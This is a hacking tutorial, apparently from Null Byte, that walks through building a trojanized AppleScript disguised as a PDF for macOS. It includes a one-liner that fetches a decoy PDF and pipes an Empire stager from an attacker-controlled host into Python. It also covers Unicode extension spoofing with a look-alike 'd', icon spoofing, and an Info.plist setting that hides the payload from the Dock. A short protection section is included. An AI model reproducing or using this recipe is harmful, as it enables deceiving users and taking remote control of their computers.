Hacking macOS: How to Create a Fake PDF Trojan with AppleScript, Part 2 (Disguising the Script)

May 22, 2018 10:10 PM
Apr 3, 2020 11:00 PM
636625985860691626.jpg

With the macOS stager created and the attacker's system hosting the Empire listener, the malicious AppleScript can be designed and disguised to appear as a legitimate PDF using a few Unicode and icon manipulation tricks.

A real PDF is required for the attack to work. Files over 1 MB in size would be too large and may cause the target to become suspicious. The real PDF will be downloaded every time the target opens the Trojanized AppleScript (the fake PDF), so the real PDF should be only one page and small enough to download quickly. Otherwise, the target might start wondering why it takes a few seconds for the PDF to load in Preview when it should be instantaneous.

In this follow-up to the first part on creating a malicious PDF for MacBooks, I'll show how to quickly create a PDF using the cover of a CompTIA study guide found on AllITebooks, but a higher quality image should be used during a real scenario.

Copy a PDF Cover Image

In your web browser, navigate to a site that has the PDF that's going to be cloned. In my example, that's the CompTIA study guide on AllITebooks. You don't actually need to download the PDF file, you just need the first image that appears in the preview, so right-click on that, select "Save Image As," then "Save" it with the name cover.jpg into the files/ directory.

636625922142254445.jpg

Install GIMP & Open the Image

In order to manipulate the PDF's cover image, we'll need GIMP, a popular image-manipulation application that's totally free. To install it, use the apt-get command below.

~# apt-get update && apt-get install gimp

Hit:1 https://packages.microsoft.com/repos/microsoft-debian-stretch-prod stretch InRelease
Hit:2 http://kali.download/kali kali-rolling InRelease
Reading package lists... Done
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages were automatically installed and are no longer required:
  dh-python libcodec2-0.8.1 libcrystalhd3 libdouble-conversion1 liblinear3
  libmysofa0 libtasn1-doc libwireshark11 libwiretap8 libwscodecs2 libwsutil9
Use 'apt autoremove' to remove them.
The following additional packages will be installed:
  gimp-data libamd2 libavcodec58 libavfilter7 libavformat58 libavresample4
  libavutil56 libbabl-0.1-0 libcamd2 libccolamd2 libcholmod3 libcodec2-0.9
  libcolamd2 libgegl-0.4-0 libgegl-common libgimp2.0 libheif1 libilmbase24
  libjson-c4 libmetis5 libmypaint-1.5-1 libmypaint-common libmysofa1 libopenexr24
  libpostproc55 libraw19 librubberband2 libsdl2-2.0-0 libsuitesparseconfig5
  libswresample3 libswscale5 libumfpack5 libvpx6 libwebpmux3 libx265-179

...

Setting up gimp (2.10.14-3) ...
Processing triggers for mime-support (3.62) ...
Processing triggers for hicolor-icon-theme (0.17-2) ...
Processing triggers for gnome-menus (3.31.4-3) ...
Processing triggers for libc-bin (2.30-2) ...
Processing triggers for man-db (2.8.5-2) ...
Processing triggers for desktop-file-utils (0.23-4) ...
root@kali:~#

Once installed, open cover.jpg in GIMP with the below command.

~# gimp cover.jpg

Export the Cover Image as a PDF

Next, export the image to the files/ directory by navigating to "File," then "Export As." Change the file name to real.pdf and file type to "Portable Document Format (*.pdf)."

636619124395067025.jpg

Change the Canvas Size

Apple icons must be perfectly symmetrical squares and the cover.jpg is rectangular. To fix this, navigate to the "Image" button in GIMP, then edit the "Canvas Size."

636618621906473302.jpg

Change the Width to match the Height, and click "Resize" to save the changes. The new canvas will show a ton of transparent space on the right-side of the image. To center image, use the "Align" tool found in "Tools," then "Transform Tools."

636618622441160889.jpg

Then, left-click once on image to select it, and click the "Align center" button. Notice the transparent space is even on both sides of the cover photo now, as seen below.

636618622746317178.jpg

Resize the Image

Now, resize the image by navigating to "Image," then "Scale Image," then change the Width and Height to 256 pixels.

636625945566629140.jpg

Export the Cover Image in PNG Format

Export the image again to the files/ directory by navigating to "File," then "Export As." Change the file name to cover.png and the file type to "PNG image (*.png)."

636618623550847746.jpg

Convert to ICNS Format

The last step for the images is to convert the cover.png into Apple's ICNS icon file format. This can be done by uploading the cover.png to cloudconvert and clicking the "Start Conversion" button.

636618623800067272.jpg

When the conversion is finished, download and save the .icns file to the files/ directory. There should now be four files in the files/ directory (you can check with ls).

~# cd files
~/files# ls

cover.icns  cover.jpg   cover.png   real.pdf

The cover.jpg and cover.png were used as templates and are no longer required. The real.pdf is a small PDF that will be downloaded by the target every time the AppleScript (the fake PDF) is opened. The cover.icns is the Apple icon file which will be used in a later step.

That's it for the Kali Linux end of things. To create the malicious AppleScript (fake PDF), I'll be using Script Editor in macOS High Sierra.

Create the AppleScript

It should be possible to create trojanized AppleScripts using Kali, but it's a bit more involved than this article allows for. To keep things simple, I'll use macOS with AppleScript version 2.7 and Script Editor version 2.10. If readers would like a full Kali Linux method, please leave a comment below, and I'll see what I can do.

To start, copy the real PDF that's going to be cloned to the macOS desktop. This will allow the attacker to see a side-by-side comparison while creating the fake PDF.

636618624236630366.jpg

Then, search for and open Apple's built-in Script Editor from Spotlight, Launchpad, or the "Utilities" folder in "Applications," then copy the below script into the window. This is the one-liner AppleScript that will be executed on the victim's MacBook when the fake PDF is double-clicked.

do shell script "s=ATTACKER-IP-ADDRESS:PORT; curl -s $s/real.pdf | open -f -a Preview.app & curl -s $s/script | python -"
  • The start of the script (do shell script) is the AppleScript that instructs the MacBook to run the following code.
  • The attacker's server is set as a variable (s=ATTACKER-IP-ADDRESS:PORT), and should be changed to the attacker's local IP address. For example, s=192.16.0.14:8080.
  • The real PDF is downloaded ( curl -s $s/real.pdf) from the attacker's server, piped (|) and opened (open -f -a Preview.app) using the macOS Preview application.
  • Last, the Empire stager, saved as "script" on the attacker's server, is downloaded (& curl -s $s/script | python -) and executed using Python on the victim's MacBook.

Next, click on "File" in the menu bar, then "Export," to begin saving the AppleScript.

636618624515223274.jpg

Export to the desktop using the file name fake, change the File Format to "Application," and uncheck "Show startup screen."

636618624744910421.jpg

Functionally speaking, the fake PDF behaves as intended. But looking at the two files side by side now, there's still a lot of work to be done to make it appear like the real PDF on the left.

Change the Icon

As seen in GIF above, for the real.pdf, macOS will generally use the first page of the PDF to generate the file icon. This, of course, can be easily spoofed using the .icns created earlier. To change the icon, move the cover.icns file from the Kali system to the MacBook, right-click on the fake file, then select "Get Info."

636618625468661264.jpg

Next, drag and drop the cover.icns file into fake's Info window to change the icon.

The AppleScript is starting to look more like the real PDF. With a little patience, the fold in the top-right corner of the icon, shadowing around the icon, and binder rings can be easily spoofed using GIMP and other photo editor tricks. The details of further spoofing the cover photo are a bit tedious so I'll move on — you get the idea.

636619185751473264.jpg

Spoof the File Extension with Unicode

The bigger issue is the file name. Ideally, an AppleScript with a PDF file extension is desired. But changing the file extension to .pdf causes macOS to show the AppleScripts true file extension.

As seen above, macOS automatically appends the .app extension. One way to get a convincing file extension is to use Unicode, a character encoding standard, which provides a unique number for every character.

Unicode "U+1E0B" is the Latin small letter D with a dot above it and, at a glance, appears exactly like a normal "d" character.

636618626748348470.jpg

Copying this character from the Wikipedia page and pasting it into the AppleScript file name creates a much more convincing file extension.

At a glance, this difference could easily be mistaken for a spec of dust. Upon much closer inspection, the difference in the Latin "d" is more obvious.

636619192200848712.jpg

This is just one of the many available Unicode characters which can be used for such extension spoofing attacks and other types of attacks.

Hide the Python Script from the Dock

Another issue I found with using AppleScripts in this way, the Dock shows two new items after the script has been executed.

636619193555848842.jpg

One icon represents Preview displaying the real PDF, the other icon represents the malicious Python script which executed in the background. To resolve this, right-click on the fake.pdf file, then "Show Package Contents."

636619198202410626.jpg

Navigate to the "Contents" directory, and open the "Info.plist" file in TextEdit. Add the following NSUIElement text to the Info.plist file.

<key>NSUIElement</key>
<string>1</string>

This is what it should look like in TextEdit:

636618628236785271.jpg

Opening the fake PDF will no longer spawn two icons in the macOS dock.

How to Protect Against AppleScript Attacks

If you want to make sure you don't fall victim to opening a malicious PDF like this one on your MacBook or other Mac computer, there are a few obvious things you can do to make these AppleScript payloads more noticeable.

  • Don't double-click files. It's always best to explicitly choose which program to use when opening files. Right-click on the desired file, and manually choose an application from the "Open With" menu.
  • Show all filename extensions. This Unicode trick was tested against High Sierra with the default Finder settings where "Show all filename extensions" was disabled by default. To enable this setting, navigate to "Finder" in the menu bar, then "Preferences," and check the option under the "Advanced" tab.
636619195217879743.jpg

There's more to come in my hacking macOS series. In upcoming articles, I'll explore vectors for delivering the fake.pdf files to unsuspecting macOS users, post-exploitation keyloggers, Keychain password dumping, taking screenshots through the webcam, and much more. My epic quest to debunk the myth that macOS is more secure than Windows 10 isn't over yet.

Cover image by Startup Stock Photos/PEXELS; Screenshots and GIFs by tokyoneon/Null Byte

Just updated your iPhone? You'll find new Apple Intelligence capabilities, sudoku puzzles, Camera Control enhancements, volume control limits, layered Voice Memo recordings, and other useful features. Find out what's new and changed on your iPhone with the iOS 18.2 update.

Comments

No Comments Exist

Be the first, drop a comment!